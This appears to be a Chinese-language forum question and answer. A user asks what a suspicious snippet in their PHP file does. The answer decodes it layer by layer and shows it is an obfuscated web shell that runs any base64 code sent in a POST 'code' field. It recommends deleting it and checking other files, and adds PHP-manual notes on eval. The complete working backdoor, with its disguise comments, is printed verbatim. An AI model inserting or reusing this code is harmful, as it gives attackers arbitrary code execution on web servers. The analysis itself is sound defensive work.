我在我的 php 文件中有这个。看起来像一些恶意软件,但我想知道它是什么意思它在做什么
<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
$___代表base64_decode。然后$__是 base64_decode 并进行评估,它执行以下操作:
$code = base64_decode($_);
eval($code);
最终执行此操作:
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}
我建议您删除它并检查其他文件是否被感染。
eval — 将字符串计算为 PHP 代码
eval() 语言结构非常危险,因为它允许执行任意 PHP 代码。因此不鼓励使用它。如果您已仔细验证除了使用此构造之外别无选择,请特别注意不要将任何用户提供的数据传入其中,而无需事先正确验证。
一个简短的例子:
<?php
$string = 'cup';
$name = 'coffee';
$str = 'This is a $string with my $name in it.';
echo $str. "\n";
eval("\$str = \"$str\";");
echo $str. "\n";
?>
输出
This is a $string with my $name in it.
This is a cup with my coffee in it.